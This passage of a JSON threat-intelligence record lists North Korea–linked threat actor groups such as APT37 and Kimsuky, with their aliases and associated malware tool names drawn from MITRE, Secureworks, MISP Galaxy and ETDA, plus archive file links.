				"Moldy Pisces ",
				"Operation Daybreak ",
				"Operaton Erebus ",
				"RICOCHET CHOLLIMA ",
				"Reaper ",
				"ScarCruft ",
				"TA-RedAnt ",
				"Venus 121 "
			],
			"source_name": "Secureworks:NICKEL FOXCROFT",
			"tools": [
				"Bluelight",
				"Chinotto",
				"GOLDBACKDOOR",
				"KevDroid",
				"KoSpy",
				"PoorWeb",
				"ROKRAT",
				"final1stpy"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "bbe36874-34b7-4bfb-b38b-84a00b07042e",
			"created_at": "2022-10-25T15:50:23.375277Z",
			"updated_at": "2026-04-10T02:00:05.327922Z",
			"deleted_at": null,
			"main_name": "APT37",
			"aliases": [
				"APT37",
				"InkySquid",
				"ScarCruft",
				"Group123",
				"TEMP.Reaper",
				"Ricochet Chollima"
			],
			"source_name": "MITRE:APT37",
			"tools": [
				"BLUELIGHT",
				"CORALDECK",
				"KARAE",
				"SLOWDRIFT",
				"ROKRAT",
				"SHUTTERSPEED",
				"POORAIM",
				"HAPPYWORK",
				"Final1stspy",
				"Cobalt Strike",
				"NavRAT",
				"DOGCALL",
				"WINERACK"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "552ff939-52c3-421b-b6c9-749cbc21a794",
			"created_at": "2023-01-06T13:46:38.742547Z",
			"updated_at": "2026-04-10T02:00:03.08515Z",
			"deleted_at": null,
			"main_name": "APT37",
			"aliases": [
				"Operation Daybreak",
				"Red Eyes",
				"ScarCruft",
				"G0067",
				"Group123",
				"Reaper Group",
				"Ricochet Chollima",
				"ATK4",
				"APT 37",
				"Operation Erebus",
				"Moldy Pisces",
				"APT-C-28",
				"Group 123",
				"InkySquid",
				"Venus 121"
			],
			"source_name": "MISPGALAXY:APT37",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "191d7f9a-8c3c-442a-9f13-debe259d4cc2",
			"created_at": "2022-10-25T15:50:23.280374Z",
			"updated_at": "2026-04-10T02:00:05.305572Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"Kimsuky",
				"Black Banshee",
				"Velvet Chollima",
				"Emerald Sleet",
				"THALLIUM",
				"APT43",
				"TA427",
				"Springtail"
			],
			"source_name": "MITRE:Kimsuky",
			"tools": [
				"Troll Stealer",
				"schtasks",
				"Amadey",
				"GoBear",
				"Brave Prince",
				"CSPY Downloader",
				"gh0st RAT",
				"AppleSeed",
				"Gomir",
				"NOKKI",
				"QuasarRAT",
				"Gold Dragon",
				"PsExec",
				"KGH_SPY",
				"Mimikatz",
				"BabyShark",
				"TRANSLATEXT"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "760f2827-1718-4eed-8234-4027c1346145",
			"created_at": "2023-01-06T13:46:38.670947Z",
			"updated_at": "2026-04-10T02:00:03.062424Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"G0086",
				"Emerald Sleet",
				"THALLIUM",
				"Springtail",
				"Sparkling Pisces",
				"Thallium",
				"Operation Stolen Pencil",
				"APT43",
				"Velvet Chollima",
				"Black Banshee"
			],
			"source_name": "MISPGALAXY:Kimsuky",
			"tools": [
				"xrat",
				"QUASARRAT",
				"RDP Wrapper",
				"TightVNC",
				"BabyShark",
				"RevClient"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "c8bf82a7-6887-4d46-ad70-4498b67d4c1d",
			"created_at": "2025-08-07T02:03:25.101147Z",
			"updated_at": "2026-04-10T02:00:03.846812Z",
			"deleted_at": null,
			"main_name": "NICKEL KIMBALL",
			"aliases": [
				"APT43 ",
				"ARCHIPELAGO ",
				"Black Banshee ",
				"Crooked Pisces ",
				"Emerald Sleet ",
				"ITG16 ",
				"Kimsuky ",
				"Larva-24005 ",
				"Opal Sleet ",
				"Ruby Sleet ",
				"SharpTongue ",
				"Sparking Pisces ",
				"Springtail ",
				"TA406 ",
				"TA427 ",
				"THALLIUM ",
				"UAT-5394 ",
				"Velvet Chollima "
			],
			"source_name": "Secureworks:NICKEL KIMBALL",
			"tools": [
				"BabyShark",
				"FastFire",
				"FastSpy",
				"FireViewer",
				"Konni"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "71a1e16c-3ba6-4193-be62-be53527817bc",
			"created_at": "2022-10-25T16:07:23.753455Z",
			"updated_at": "2026-04-10T02:00:04.73769Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"APT 43",
				"Black Banshee",
				"Emerald Sleet",
				"G0086",
				"G0094",
				"ITG16",
				"KTA082",
				"Kimsuky",
				"Larva-24005",
				"Larva-25004",
				"Operation Baby Coin",
				"Operation Covert Stalker",
				"Operation DEEP#DRIVE",
				"Operation DEEP#GOSU",
				"Operation Kabar Cobra",
				"Operation Mystery Baby",
				"Operation Red Salt",
				"Operation Smoke Screen",
				"Operation Stealth Power",
				"Operation Stolen Pencil",
				"SharpTongue",
				"Sparkling Pisces",
				"Springtail",
				"TA406",
				"TA427",
				"Thallium",
				"UAT-5394",
				"Velvet Chollima"
			],
			"source_name": "ETDA:Kimsuky",
			"tools": [
				"AngryRebel",
				"AppleSeed",
				"BITTERSWEET",
				"BabyShark",
				"BoBoStealer",
				"CSPY Downloader",
				"Farfli",
				"FlowerPower",
				"Gh0st RAT",
				"Ghost RAT",
				"Gold Dragon",
				"GoldDragon",
				"GoldStamp",
				"JamBog",
				"KGH Spyware Suite",
				"KGH_SPY",
				"KPortScan",
				"KimJongRAT",
				"Kimsuky",
				"LATEOP",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Lovexxx",
				"MailPassView",
				"Mechanical",
				"Mimikatz",
				"MoonPeak",
				"Moudour",
				"MyDogs",
				"Mydoor",
				"Network Password Recovery",
				"PCRat",
				"ProcDump",
				"PsExec",
				"ReconShark",
				"Remote Desktop PassView",
				"SHARPEXT",
				"SWEETDROP",
				"SmallTiger",
				"SniffPass",
				"TODDLERSHARK",
				"TRANSLATEXT",
				"Troll Stealer",
				"TrollAgent",
				"VENOMBITE",
				"WebBrowserPassView",
				"xRAT"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775439060,
	"ts_updated_at": 1775792260,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/930cc42115fcbd879cf67403b12c3a3e4e347abe.pdf",
		"text": "https://archive.orkl.eu/930cc42115fcbd879cf67403b12c3a3e4e347abe.txt",
		"img": "https://archive.orkl.eu/930cc42115fcbd879cf67403b12c3a3e4e347abe.jpg"
	}
}